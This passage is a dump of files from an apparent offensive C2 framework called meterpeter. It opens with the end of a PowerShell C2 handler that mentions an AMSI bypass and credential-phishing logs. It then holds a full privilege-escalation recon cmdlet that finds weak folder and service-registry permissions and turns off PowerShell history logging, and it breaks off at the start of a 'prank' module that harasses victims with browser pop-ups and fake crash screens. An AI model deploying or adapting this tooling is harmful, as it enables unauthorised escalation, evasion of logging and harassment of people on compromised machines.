}\r\n If($Flipflop -ieq \"True\")\r\n {\r\n write-host \" Remark Client:Admin triggers 'ams`istream-ByP`ass(PSv2)'`n\" -ForeGroundColor yellow;Start-Sleep -Seconds 1;\r\n $Flipflop = \"False\";\r\n }\r\n If($Camflop -ieq \"True\")\r\n {\r\n write-host \"`n`n CommandCam syntax\" -ForeGroundColor Green;\r\n write-host \" -----------------\";\r\n Write-Host \" :meterpeter> .\\CommandCam.exe`n\";\r\n $Camflop = \"False\";\r\n }\r\n If($Phishing -ieq \"True\")\r\n {\r\n $OutPut = $OutPut -replace \".ps1\",\".log\";\r\n write-host \" output $OutPut`n\";\r\n $Phishing = \"False\";\r\n }\r\n If($NewPhishing -ieq \"True\")\r\n {\r\n $OutPut = $OutPut -replace \"NewPhish.ps1\",\"CredsPhish.log\";\r\n write-host \" output $OutPut`n\";\r\n $NewPhishing = \"False\";\r\n }\r\n $Command = $Null;\r\n } Else {\r\n Write-Host \"`n`n Status File Path\" -ForeGroundColor green;\r\n Write-Host \" ------ ---------\";\r\n Write-Host \" Failed $File (Already Exists Remote)`n\" -ForeGroundColor red;\r\n $Command = $Null;\r\n }\r\n $Upload = $False;\r\n }\r\n $WaitData = $False;\r\n $Read = $Null;\r\n $OutPut = $Null;\r\n }\r\n }\r\n}" }, { "path": "mimiRatz/ACLMitreT1574.ps1", "content": "<#\r\n.SYNOPSIS\r\n MITRE ATT&CK - T1574\r\n\r\n Author: @r00t-3xp10it\r\n Tested Under: Windows 10 (19043) x64 bits\r\n Required Dependencies: Get-Acl {native}\r\n Optional Dependencies: none\r\n PS cmdlet Dev version: v2.5.11\r\n\r\n.DESCRIPTION\r\n Cmdlet to search for weak directory permissions (F) (M) (W) that\r\n allow attackers to Escalate Privileges on target system [ local ]\r\n\r\n.NOTES\r\n This cmdlet its a auxiliary module of @Meterpeter C2 v2.10.11 release.\r\n If invoked -action 'path' then cmdlet scans all environement paths for\r\n FileSystemRigths 'FullControl, Modify' with 'Everyone,Users,UserName'\r\n\r\n If invoked -action 'dir' then cmdlet scans recursive $Env:PROGRAMFILES\r\n ${Env:PROGRAMFILES(x86)},$Env:LOCALAPPDATA\\Programs default directrorys\r\n for FileSystemRigths 'FullControl,Modify' with GroupName 'Everyone,Users'\r\n\r\n If invoked -extraperm 'true' @argument then cmdlet adds extra\r\n permission to the 'ACL_Permissions_List' (permisssion: Write)\r\n Remark: extraperm parameter takes a long time to finish if invoked\r\n together with -action 'dir' @arg (Scan recursive pre-defined paths)\r\n\r\n If invoked -extraGroup 'true' @argument then cmdlet adds extra Group\r\n Name to the 'Groups_To_Scan_List' (NT AUTHORITY\\Authenticated Users)\r\n\r\n Remark: Parameter -scan 'string' only works if invoked together\r\n with -action 'dir' @argument ( Scan recursive pre-defined paths ) and\r\n it will scan recursive the inputed directory ( excluding pre-defined )\r\n\r\n.Parameter Action\r\n Accepts arguments: dir, path, reg (default: dir)\r\n\r\n.Parameter extraperm\r\n Add extra permission to permissions_list? (default: false)\r\n\r\n.Parameter scan\r\n The directory absoluct path to scan recursive (default: false)\r\n\r\n.Parameter extraGroup\r\n Add extra group name to groups_to_scan_list? (default: false)\r\n\r\n.Parameter Verb\r\n Display the paths beeing scanned in realtime? (default: false)\r\n\r\n.Parameter Logfile\r\n Create report logfile on %tmp% directory? (default: false)\r\n \r\n.EXAMPLE\r\n PS C:\\> .\\ACLMitreT1574.ps1\r\n Scan recursive in pre-defined directorys for 'Everyone,\r\n BUILTIN\\Users' GroupNames with 'FullControl,Modify' ACL\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\ACLMitreT1574.ps1 -action path\r\n Scans all environement paths for 'Everyone,BUILTIN\\Users,\r\n DOMAIN\\UserName' GroupNames with 'FullControl,Modify' ACL\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\ACLMitreT1574.ps1 -action path -logfile true\r\n Scans all environement paths for 'Everyone,BUILTIN\\Users,\r\n DOMAIN\\UserName' GroupNames with 'FullControl,Modify' ACL\r\n and create report logfile on %tmp% directory ..\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\ACLMitreT1574.ps1 -action dir -extraperm true\r\n Scan recursive in pre-defined directorys for 'Everyone,\r\n BUILTIN\\Users' GroupNames with 'FullControl,Modify,Write'\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\ACLMitreT1574.ps1 -action dir -scan \"C:\\Users\\pedro\\Coding\"\r\n Scan recursive -scan 'C:\\Users\\pedro\\Coding' for 'Everyone, BUILTIN\\Users'\r\n GroupNames with 'FullControl,Modify' ACL permissions settings.\r\n\r\n.INPUTS\r\n None. You cannot pipe objects into ACLMitreT1574.ps1\r\n\r\n.OUTPUTS\r\n VulnId : 1::ACL (Mitre T1574)\r\n FolderPath : C:\\Program Files (x86)\\Resource Hacker\r\n FileSystemRights : FullControl\r\n IdentityReference : Everyone\r\n IsInherited : False\r\n\r\n VulnId : 2::ACL (Mitre T1574)\r\n FolderPath : C:\\Program Files (x86)\\Resource Hacker\\help\r\n FileSystemRights : FullControl\r\n IdentityReference : Everyone\r\n IsInherited : True\r\n\r\n VulnId : 3::ACL (Mitre T1574)\r\n FolderPath : C:\\Program Files (x86)\\Resource Hacker\\samples\r\n FileSystemRights : FullControl\r\n IdentityReference : Everyone\r\n IsInherited : True\r\n\r\n VulnId : 4::ACL (Mitre T1574)\r\n FolderPath : C:\\Program Files (x86)\\Starcraft2\\OobehgtrDoncFjp\r\n FileSystemRights : Modify\r\n IdentityReference : SKYNET\\pedro\r\n IsInherited : False\r\n\r\n VulnId : 5::ACL (Mitre T1574)\r\n FolderPath : C:\\Program Files (x86)\\Starcraft2\\OobehgtrDoncFjp\\games\r\n FileSystemRights : Write\r\n IdentityReference : BUILTIN\\Users\r\n IsInherited : True\r\n \r\n.LINK\r\n https://attack.mitre.org/techniques/T1574/010\r\n https://github.com/r00t-3xp10it/meterpeter/blob/master/mimiRatz/FindEop.bat\r\n https://github.com/r00t-3xp10it/meterpeter/blob/master/mimiRatz/ACLMitreT1574.ps1\r\n#>\r\n\r\n\r\n [CmdletBinding(PositionalBinding=$false)] param(\r\n [string]$extraGroup=\"false\",\r\n [string]$extraperm=\"false\",\r\n [string]$logfile=\"false\",\r\n [string]$Action=\"dir\",\r\n [string]$Scan=\"false\",\r\n [string]$Egg=\"false\",\r\n [string]$Verb=\"false\"\r\n)\r\n\r\n\r\n$Count = 0 #VulnId Counter\r\n$ScanStartTimer = (Get-Date)\r\n$CmdletVersion = \"v2.5.11\" #CmdLet version\r\n#Disable Powershell Command Logging for current session.\r\nSet-PSReadlineOption –HistorySaveStyle SaveNothing|Out-Null\r\n$host.UI.RawUI.WindowTitle = \"@ACLMitreT1574 $CmdletVersion {SSA@RedTeam}\"\r\n$Rand = -join (((48..57)+(65..90)+(97..122)) * 80 |Get-Random -Count 6 |%{[char]$_})\r\nIf($Egg -ieq \"false\")\r\n{\r\n Write-Host \"* Searching for weak directory permissions ..`n\" -ForegroundColor Green\r\n}\r\n\r\n#Define the GroupName based on the language pack installed!\r\n$LanguageSetting = ([CultureInfo]::InstalledUICulture).Name\r\nIf($LanguageSetting -iMatch '^(pt-PT)$')\r\n{\r\n $UserGroup = \"Todos\" #Default scan\r\n $UtilGroup = \"BUILTIN\\\\Utilizadores\" #Default scan\r\n $GroupFdx = \"$Env:USERDOMAIN\\\\$Env:USERNAME\" #Default scan - Only available with -action 'path'\r\n $OneMorek = \"NT AUTHORITY\\\\Utilizadores Autenticados\" #extra Group Name - Only available with -extragroup 'true'\r\n}\r\nElseIf($LanguageSetting -iMatch '^(fr-FR)$')\r\n{\r\n $UserGroup = \"Tout\" #Default scan\r\n $UtilGroup = \"BUILTIN\\\\Utilisateurs\" #Default scan\r\n $GroupFdx = \"$Env:USERDOMAIN\\\\$Env:USERNAME\" #Default scan - Only available with -action 'path'\r\n $OneMorek = \"NT AUTHORITY\\\\Utilisateurs authentifiés\" #extra Group Name - Only available with -extragroup 'true'\r\n\r\n}\r\nElseIf($LanguageSetting -iMatch '^(pl)')\r\n{\r\n $UserGroup = \"Wszystkie\" #Default scan\r\n $UtilGroup = \"BUILTIN\\\\użytkownicy\" #Default scan\r\n $GroupFdx = \"$Env:USERDOMAIN\\\\$Env:USERNAME\" #Default scan - Only available with -action 'path'\r\n $OneMorek = \"NT AUTHORITY\\\\Uwierzytelnieni użytkownicy\" #extra Group Name - Only available with -extragroup 'true'\r\n\r\n}\r\nElseIf($LanguageSetting -iMatch '^(in)')\r\n{\r\n #My Wife Language pack!\r\n $UserGroup = \"Semua\" #Default scan\r\n $UtilGroup = \"BUILTIN\\\\Pengguna\" #Default scan\r\n $GroupFdx = \"$Env:USERDOMAIN\\\\$Env:USERNAME\" #Default scan - Only available with -action 'path'\r\n $OneMorek = \"NT AUTHORITY\\\\Pengguna yang Diautentikasi\" #extra Group Name - Only available with -extragroup 'true'\r\n\r\n}\r\nElseIf($LanguageSetting -iMatch '^(ro)')\r\n{\r\n $UserGroup = \"Toate\" #Default scan\r\n $UtilGroup = \"BUILTIN\\\\utilizatorii\" #Default scan\r\n $GroupFdx = \"$Env:USERDOMAIN\\\\$Env:USERNAME\" #Default scan - Only available with -action 'path'\r\n $OneMorek = \"NT AUTHORITY\\\\Utilizatori autentificați\" #extra Group Name - Only available with -extragroup 'true'\r\n\r\n}\r\nElse\r\n{\r\n $UserGroup = \"Everyone\" #Default scan\r\n $UtilGroup = \"BUILTIN\\\\Users\" #Default scan\r\n $GroupFdx = \"$Env:USERDOMAIN\\\\$Env:USERNAME\" #Default scan - Only available with -action 'path'\r\n $OneMorek = \"NT AUTHORITY\\\\Authenticated Users\" #extra Group Name - Only available with -extragroup 'true'\r\n}\r\nIf($logfile -ieq \"True\")\r\n{\r\n #Create logfile on %tmp% directory if sellected by user.\r\n echo \"Logfile created by ACLMitre1574\" > $Env:TMP\\Mitre1574-$Rand.log\r\n echo \"Scan Start: $ScanStartTimer\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n echo \"------------------------------------------\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n}\r\n\r\n\r\nIf($Action -ieq \"path\")\r\n{\r\n\r\n <#\r\n .SYNOPSIS\r\n Author: @r00t-3xp10it\r\n Helper - Search in environement paths for dirs with weak permissions!\r\n\r\n .NOTES\r\n If invoked -verb 'true' @argument then cmdlet displays all\r\n the directory paths beeing scanned in realtime (more_slow)\r\n\r\n If invoked -extraperm 'true' @argument then cmdlet adds extra\r\n permissions to the 'ACL_Permissions_List' (permission: Write)\r\n\r\n If invoked -extraGroup 'true' @argument then cmdlet adds one\r\n extra Group Name to the 'Group_Names_To_Scan_List' : 'Everyone,\r\n BUILTIN\\Users, DOMAIN\\UserName, NT AUTHORITY\\Authenticated Users'\r\n #>\r\n\r\n #ACL Permissions List\r\n $DirectoryPermission = @(\r\n \"FullControl\",\"Modify\"\r\n )\r\n\r\n If($extraperm -ieq \"True\")\r\n {\r\n #-extraperm 'true' add 'Write' permission\r\n $DirectoryPermission += \"Write\"\r\n }\r\n If($extraGroup -ieq \"True\")\r\n {\r\n #Add extra Group Name if invoked -extragroup 'string' param\r\n $FinalGroupList = \"$UserGroup|$UtilGroup|$GroupFdx|$OneMorek\"\r\n }\r\n Else\r\n {\r\n $FinalGroupList = \"$UserGroup|$UtilGroup|$GroupFdx\" \r\n }\r\n\r\n #Get Environement Paths and split(';') each catched path.\r\n $EnvironementPaths = ($Env:Path).Split(';') | ? {$_ -ne ''}\r\n\r\n $NewCounter = 0 #Group Name Id\r\n #Loop trough all '$Environement' catched paths.\r\n ForEach($TokenPath in $EnvironementPaths)\r\n {\r\n #Loop trough all 'ACL Permissions List' Items\r\n ForEach($ACLPermission in $DirectoryPermission)\r\n {\r\n If($Verb -ieq \"True\")\r\n {\r\n $NewCounter++\r\n #Display OnScreen directory paths beeing scanned in realtime\r\n Write-Host \"[VERBOSE] Scanning: \" -ForegroundColor Blue -BackgroundColor Black -NoNewLine;\r\n Write-Host \"$TokenPath\" -ForegroundColor Green -BackgroundColor Black;\r\n write-host \"[VERBOSE] Identity: \" -ForegroundColor Blue -BackgroundColor Black -NoNewLine;\r\n write-host \"[$NewCounter] $FinalGroupList\" -ForegroundColor DarkGray -BackgroundColor Black -NoNewLine;\r\n Write-Host \" - Permission \" -ForegroundColor Blue -BackgroundColor Black -NoNewLine;\r\n Write-Host \"$ACLPermission\" -ForegroundColor DarkGray -BackgroundColor Black -NoNewLine;\r\n Write-Host \".\" -ForegroundColor Blue -BackgroundColor Black;\r\n Start-Sleep -Milliseconds 100\r\n }\r\n\r\n #Get directory ACL settings\r\n $IsInHerit = (Get-Acl \"$TokenPath\").Access.IsInherited | Select-Object -First 1\r\n (Get-Acl \"$TokenPath\").Access | Where-Object {#Search for Everyone:(F) \\ Everyone:(M) directory permissions (default)\r\n $CleanOutput = $_.FileSystemRights -Match \"$ACLPermission\" -and $_.IdentityReference -iMatch \"^($FinalGroupList)$\" ## pt-PT = Todos\r\n\r\n If($CleanOutput)\r\n {\r\n If($Verb -ieq \"True\"){Write-Host \"\"}\r\n $Count++ #Write the Table 'IF' found any vulnerable permissions\r\n Write-Host \"VulnId : ${Count}::ACL (Mitre T1574)\"\r\n Write-Host \"FolderPath : $TokenPath\" -ForegroundColor Green -BackgroundColor Black\r\n Write-Host \"FileSystemRights : $ACLPermission\" -ForegroundColor yellow\r\n Write-Host \"IdentityReference :\"$_.IdentityReference.ToString()\r\n Write-Host \"IsInherited : $IsInHerit`n\"\r\n\r\n If($logfile -ieq \"True\")\r\n {\r\n $MyReference = $_.IdentityReference.ToString()\r\n echo \"VulnId : ${Count}::ACL (Mitre T1574)\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n echo \"FolderPath : $TokenPath\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n echo \"FileSystemRights : $ACLPermission\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n echo \"IdentityReference : $MyReference\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n echo \"IsInherited : $IsInHerit`n\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n }\r\n\r\n }##End of Table\r\n }## End of Get-Acl loop\r\n }##End of the 2º ForEach()\r\n }##End of the 1º ForEach()\r\n\r\n If($Count -eq 0)\r\n {\r\n Write-Host \"[ ERROR ] none permissions found that match the search criteria.\" -ForegroundColor Red -BackgroundColor Black\r\n Write-Host \"\"\r\n }\r\n\r\n}\r\n\r\n\r\nIf($Action -ieq \"dir\")\r\n{\r\n\r\n <#\r\n .SYNOPSIS\r\n Author: @r00t-3xp10it\r\n Helper - Search in Pre-Defined paths (recursive) for dirs with weak permissions!\r\n\r\n .NOTES\r\n If invoked -verb 'true' @argument then cmdlet displays all\r\n the directory paths beeing scanned in realtime (more_slow)\r\n\r\n If invoked -extraperm 'true' @argument then cmdlet adds extra\r\n permissions to the 'ACL_Permissions_List' (permission: Write)\r\n Remark: extraperm parameter takes a long time to finish ..\r\n\r\n If invoked -extraGroup 'true' @argument then cmdlet adds one\r\n extra Group Name to the 'Group_Names_To_Scan_List' : 'Everyone,\r\n BUILTIN\\Users, NT AUTHORITY\\Authenticated Users' Group Names\r\n\r\n Parameter -scan 'string' scans recursive the inputed\r\n directory, excluding all pre-defined 'Directorys_To_Scan_List'\r\n #>\r\n\r\n #ACL Permissions List\r\n $DirectoryPermission = @(\r\n \"FullControl\",\"Modify\"\r\n )\r\n\r\n If($extraperm -ieq \"True\")\r\n {\r\n #-extraperm 'true' add 'Write' permission\r\n $DirectoryPermission += \"Write\"\r\n }\r\n If($extraGroup -ieq \"True\")\r\n {\r\n #Add extra Group Name if invoked -extragroup 'string' param\r\n $FinalGroupList = \"$UserGroup|$UtilGroup|$OneMorek\"\r\n }\r\n Else\r\n {\r\n $FinalGroupList = \"$UserGroup|$UtilGroup\" \r\n }\r\n\r\n If($scan -ne \"false\")\r\n {\r\n #Make sure User directory input exists\r\n If(-not(Test-Path -Path \"$scan\" -EA SilentlyContinue))\r\n {\r\n $Verb = \"True\"\r\n If(-not($DirectoryPermission.Contains('Write'))){$DirectoryPermission += \"Write\"}\r\n Write-Host \"* ERROR: directory not found: '$scan'\" -ForegroundColor Red -BackgroundColor Black\r\n Write-Host \" => DEMO: Setting scan to 'Crypto\\RSA\\MachineKeys'..`n\" -ForegroundColor Yellow;Start-Sleep -Seconds 2\r\n $RawDataBaseList = Get-ChildItem -Path \"$Env:WINDIR\\System32\\Microsoft\\Crypto\\RSA\" -Recurse -ErrorAction SilentlyContinue -Force | Where-Object {\r\n $_.PSIsContainer -and $_.FullName -iNotMatch '(.DLL|.EXE)$' } | Select-Object -ExpandProperty FullName\r\n }\r\n Else\r\n {\r\n #Inputed directory path found [ -scan 'string' ] ..\r\n #Directorys to search recursive: The directory tree inputed by user!\r\n $RawDataBaseList = Get-ChildItem -Path \"$scan\" -Recurse -ErrorAction SilentlyContinue -Force | Where-Object {\r\n $_.PSIsContainer -and $_.FullName -iNotMatch '(.DLL|.EXE)$' } | Select-Object -ExpandProperty FullName\r\n } \r\n }\r\n Else\r\n {\r\n #Default directory scans\r\n #Directorys to search recursive: $Env:PROGRAMFILES, ${Env:PROGRAMFILES(x86)}, $Env:LOCALAPPDATA\\Programs\r\n $RawDataBaseList = Get-ChildItem -Path \"$Env:PROGRAMFILES\", \"${Env:PROGRAMFILES(x86)}\", \"$Env:LOCALAPPDATA\\Programs\" -Recurse -ErrorAction SilentlyContinue -Force | Where-Object {\r\n $_.PSIsContainer -and $_.FullName -iNotMatch '(.DLL|.EXE)$' } | Select-Object -ExpandProperty FullName\r\n\r\n #Adding extra values to database ^_^ ..\r\n $RawDataBaseList += \"$Env:WINDIR\\tracing\"\r\n $RawDataBaseList += \"$Env:WINDIR\\System32\\Tasks\"\r\n $RawDataBaseList += \"$Env:WINDIR\\System32\\Tasks_Migrated\"\r\n $RawDataBaseList += \"$Env:WINDIR\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\"\r\n }\r\n\r\n\r\n $NewCounter = 0 #Group Name Id\r\n #Loop trough all ChildItem catched paths\r\n ForEach($TokenPath in $RawDataBaseList)\r\n {\r\n #Exclude 'WindowsApps' from scans\r\n If(-not($TokenPath -Match 'WindowsApps'))\r\n {\r\n #Loop trough all 'ACL Permissions List' Items\r\n ForEach($ACLPermission in $DirectoryPermission)\r\n {\r\n If($Verb -ieq \"True\")\r\n {\r\n $NewCounter++\r\n #Display OnScreen directory paths beeing scanned in realtime\r\n Write-Host \"[VERBOSE] Scanning: \" -ForegroundColor Blue -BackgroundColor Black -NoNewLine;\r\n Write-Host \"$TokenPath\" -ForegroundColor Green -BackgroundColor Black;\r\n write-host \"[VERBOSE] Identity: \" -ForegroundColor Blue -BackgroundColor Black -NoNewLine;\r\n write-host \"[$NewCounter] $FinalGroupList\" -ForegroundColor DarkGray -BackgroundColor Black -NoNewLine;\r\n Write-Host \" - Permission \" -ForegroundColor Blue -BackgroundColor Black -NoNewLine;\r\n Write-Host \"$ACLPermission\" -ForegroundColor DarkGray -BackgroundColor Black -NoNewLine;\r\n Write-Host \".\" -ForegroundColor Blue -BackgroundColor Black;\r\n Start-Sleep -Milliseconds 100\r\n }\r\n\r\n #Get directory ACL settings\r\n $IsInHerit = (Get-Acl \"$TokenPath\").Access.IsInherited | Select-Object -First 1\r\n (Get-Acl \"$TokenPath\").Access | Where-Object {#Search for Everyone:(F) \\ Everyone:(M) directory permissions (default)\r\n $CleanOutput = $_.FileSystemRights -Match \"$ACLPermission\" -and $_.IdentityReference -iMatch \"^($FinalGroupList)$\" ## pt-PT = Todos\r\n\r\n If($CleanOutput)\r\n {\r\n If($Verb -ieq \"True\"){Write-Host \"\"}\r\n $Count++ #Write the Table 'IF' found any vulnerable permissions\r\n Write-Host \"VulnId : ${Count}::ACL (Mitre T1574)\"\r\n Write-Host \"FolderPath : $TokenPath\" -ForegroundColor Green -BackgroundColor Black\r\n Write-Host \"FileSystemRights : $ACLPermission\" -ForegroundColor yellow\r\n Write-Host \"IdentityReference :\"$_.IdentityReference.ToString()\r\n Write-Host \"IsInherited : $IsInHerit`n\"\r\n\r\n If($logfile -ieq \"True\")\r\n {\r\n $MyReference = $_.IdentityReference.ToString()\r\n echo \"VulnId : ${Count}::ACL (Mitre T1574)\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n echo \"FolderPath : $TokenPath\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n echo \"FileSystemRights : $ACLPermission\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n echo \"IdentityReference : $MyReference\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n echo \"IsInherited : $IsInHerit`n\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n }\r\n\r\n }##End of Table\r\n }## End of Get-Acl loop\r\n }##End of 2º ForEach() loop\r\n }## End of Exclude WindowsApps\r\n }## End of the 1º ForEach() loop\r\n\r\n If($Count -eq 0)\r\n {\r\n Write-Host \"[ ERROR ] none permissions found that match the search criteria.\" -ForegroundColor Red -BackgroundColor Black\r\n Write-Host \"\"\r\n }\r\n\r\n}\r\n\r\n\r\nIf($Action -ieq \"reg\")\r\n{\r\n\r\n <#\r\n .SYNOPSIS\r\n Author: @r00t-3xp10it\r\n Helper - Search in registry for services with weak permissions!\r\n\r\n .NOTES\r\n If invoked -verb 'true' @argument then cmdlet displays all\r\n the directory paths beeing scanned in realtime (more_slow)\r\n\r\n If invoked -extraGroup 'true' @argument then cmdlet adds\r\n two extra Group Names to the 'Group_Names_To_Scan_List':\r\n 'Everyone, BUILTIN\\Users, NT AUTHORITY\\Authenticated Users'\r\n #>\r\n\r\n #ACL Group Names List\r\n $Count = 0 #RegKeysCounter\r\n $NewCounter = 0 #Group Name Id\r\n $WeakPerm = @(\"FullControl\")\r\n\r\n If($extraGroup -ieq \"False\")\r\n {\r\n #Defaul Group Name List\r\n $FinalGroupList = \"$UserGroup\" \r\n }\r\n Else\r\n {\r\n $FinalGroupList = @(#Add 2 extra Group Names to List\r\n \"$UserGroup\",\"$UtilGroup\",\"$OneMorek\"\r\n ) \r\n }\r\n\r\n\r\n ## Get ALL services under HKLM hive key\r\n $GetPath = (Get-Acl -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\services\\*\" -EA SilentlyContinue).PSPath\r\n $ParseData = $GetPath -replace 'Microsoft.PowerShell.Core\\\\Registry::HKEY_LOCAL_MACHINE\\\\','HKLM:\\'\r\n ForEach($Token in $ParseData)\r\n {\r\n #Loop trough all 'Group Names List' Items\r\n ForEach($GroupServiceName in $FinalGroupList)\r\n {\r\n ## Loop trough $FinalGroupList services database\r\n $IsInHerit = (Get-Acl -Path \"$Token\").Access.IsInherited | Select -First 1\r\n $CleanOutput = (Get-Acl -Path \"$Token\").Access | Select-Object * | Where-Object {## Search for Everyone:(F) registry service permissions (default)\r\n $_.IdentityReference -Match \"^($GroupServiceName)\" -and $_.RegistryRights -Match \"^($WeakPerm)\"\r\n }\r\n\r\n If($Verb -ieq \"True\")\r\n {\r\n $NewCounter++\r\n #Display OnScreen registry keys beeing scanned in realtime\r\n Write-Host \"[VERBOSE] Scanning: \" -ForegroundColor Blue -BackgroundColor Black -NoNewLine;\r\n Write-Host \"$Token\" -ForegroundColor Green -BackgroundColor Black;\r\n write-host \"[VERBOSE] Identity: \" -ForegroundColor Blue -BackgroundColor Black -NoNewLine;\r\n write-host \"[$NewCounter] $GroupServiceName\" -ForegroundColor DarkGray -BackgroundColor Black -NoNewLine;\r\n Write-Host \" - Permission \" -ForegroundColor Blue -BackgroundColor Black -NoNewLine;\r\n Write-Host \"$WeakPerm\" -ForegroundColor DarkGray -BackgroundColor Black -NoNewLine;\r\n Write-Host \".\" -ForegroundColor Blue -BackgroundColor Black;\r\n Start-Sleep -Milliseconds 100\r\n }\r\n\r\n If($CleanOutput)\r\n {\r\n If($Verb -ieq \"True\"){Write-Host \"\"}\r\n $Count++ ## Write the Table 'IF' found any vulnerable permissions\r\n Write-Host \"VulnId : ${Count}::SRV\"\r\n Write-Host \"RegistryPath : $Token\" -ForegroundColor Yellow\r\n Write-Host \"IdentityReference : $GroupServiceName\"\r\n Write-Host \"RegistryRights : $WeakPerm\"\r\n Write-Host \"AccessControlType : Allow -\"$CleanOutput.AccessControlType\r\n Write-Host \"IsInherited : $IsInHerit`n\"\r\n\r\n If($logfile -ieq \"True\")\r\n {\r\n echo \"VulnId : ${Count}::SRV\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n echo \"RegistryPath : $Token\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n echo \"IdentityReference : $GroupServiceName\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n echo \"RegistryRights : $WeakPerm\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n echo \"AccessControlType : Allow\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n echo \"IsInherited : $IsInHerit`n\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n }\r\n\r\n }##End of cleanoutput\r\n }##End of 2º ForEach()\r\n }##End of 1º ForEach()\r\n\r\n\r\n #Report that we have fail to find any permissions.\r\n If($Count -eq 0 -or $Count -ieq $null)\r\n {\r\n $parseData = ($FinalGroupList -split ' ').Count\r\n If($parseData -gt 1)\r\n {\r\n Write-Host \"[REG] None registry services found with FullControl:(F)\" -ForegroundColor Red\r\n Write-Host \"[ACL] Group: '$OneMorek'\"\r\n Write-Host \"[ACL] Group: '$UtilGroup'\"\r\n Write-Host \"[ACL] Group: '$UserGroup'\"\r\n }\r\n Else\r\n {\r\n Write-Host \"[REG] None services found with ${UserGroup}:(F)\"\r\n }\r\n Write-Host \"\"\r\n\r\n If($logfile -ieq \"True\")\r\n {\r\n echo \"[REG] none services found with FullControl:(F) permissions.\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n echo \"[REG] Groups: '${FinalGroupList}'\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n }\r\n }\r\n\r\n}\r\n\r\n\r\n#Internal CmdLet Clock Timmer\r\nIf($Verb -ieq \"True\"){Write-Host \"\"}\r\n$ElapsTime = $(Get-Date) - $ScanStartTimer\r\nIf($scan -ne \"false\"){$Action = \"user_selection\"}\r\n$TotalTime = \"{0:HH:mm:ss}\" -f ([datetime]$ElapsTime.Ticks) #Count the diferense between 'start|end' scan duration!\r\nWrite-Host \"`* ElapsedTime:\" -ForegroundColor Blue -BackgroundColor Black -NoNewline;\r\nWrite-Host \"$TotalTime\" -ForegroundColor Green -BackgroundColor Black -NoNewline;\r\nWrite-Host \" - scantype:\" -ForegroundColor Blue -BackgroundColor Black -NoNewline;\r\nWrite-Host \"$Action\" -ForegroundColor Green -BackgroundColor Black;\r\n\r\nIf($logfile -ieq \"True\")\r\n{\r\n Write-Host \"* logfile: \" -ForegroundColor Blue -BackgroundColor Black -NoNewline;\r\n Write-Host \"'$Env:TMP\\Mitre1574-$Rand.log'\" -ForegroundColor Green -BackgroundColor Black;\r\n}\r\n" }, { "path": "mimiRatz/C2Prank.ps1", "content": "<#\r\n.SYNOPSIS\r\n Powershell Fake [B]SO`D Prank\r\n\r\n Author: @r00t-3xp10it (ssa redteam)\r\n Tested Under: Windows 10 (19043) x64 bits\r\n Required Dependencies: IWR, Media.SoundPlayer {native}\r\n Optional Dependencies: Critical.wav {auto-download}\r\n PS cmdlet Dev version: v1.2.13\r\n\r\n.DESCRIPTION\r\n Auxiliary module of Meterpeter C2 v2.10.14 that executes a prank in background.\r\n The prank consists in spawning diferent Gay websites on target default browser,\r\n spawn cmd terminal consoles pretending to be a kernel error while executing an\r\n sfx sound effect. It also spawns multiple windows system applications.\r\n\r\n.NOTES\r\n If not declared -wavefile 'file.wav' then cmdlet downloads the main sfx\r\n sound effect to be played in background loop. If declared then cmdlet uses\r\n file.wav as main sfx sound effect. However the Parameter declaration only\r\n accepts file.wav formats ( SoundPlayer File Format Restriction ) \r\n \r\n.Parameter MaxInteractions\r\n How many times to loop (default: 20)\r\n\r\n.Parameter DelayTime\r\n The delay time between each loop (default: 20)\r\n\r\n.Parameter WaveFile\r\n Accepts the main sfx effect file (default: Critical.wav)\r\n\r\n.Parameter PreventB`SO`D\r\n Prevent the prank from BS`O`D target? (default: true)\r\n \r\n.EXAMPLE\r\n PS C:\\> .\\C2Prank.ps1\r\n Loops for 20 times max\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\C2Prank.ps1 -MaxInteractions '8'\r\n Loops for 8 times max with 20 seconds delay\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\C2Prank.ps1 -DelayTime '2'\r\n Loops for 20 times max with 2 seconds delay\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\C2Prank.ps1 -delaytime '60' -wavefile 'alert.wav'\r\n Loops for 20 times with 60 seconds of delay + alert.wav as sfx\r\n\r\n.INPUTS\r\n None. You cannot pipe objects into C2Prank.ps1\r\n\r\n.OUTPUTS\r\n * Powershell Fake B`SOD Prank\r\n => Download 'Critical error' sfx sound effect\r\n * maxinteractions: 20 with: 30 (seconds)\r\n \r\n.LINK\r\n https://github.com/r00t-3xp10it/meterpeter\r\n#>\r\n\r\n\r\n[CmdletBinding(PositionalBinding=$false)] param(\r\n [string]$WaveFile=\"Critical.wav\",\r\n [string]$PreventBSOD=\"true\",\r\n [int]$MaxInteractions='20',\r\n [int]$DelayTime='20'\r\n)\r\n\r\n\r\n## Global variable declarations\r\n$ErrorActionPreference = \"SilentlyContinue\"\r\n[int]$FinalSfx = $MaxInteractions -1 ## Set the last interaction!\r\nwrite-host \"* Powershell Fake BS`OD Prank\" -ForegroundColor Green\r\n$LasLink = \"https://www.travelgay.pt/destination/gay-portugal/gay-lisbon\"\r\n$UrlLink = 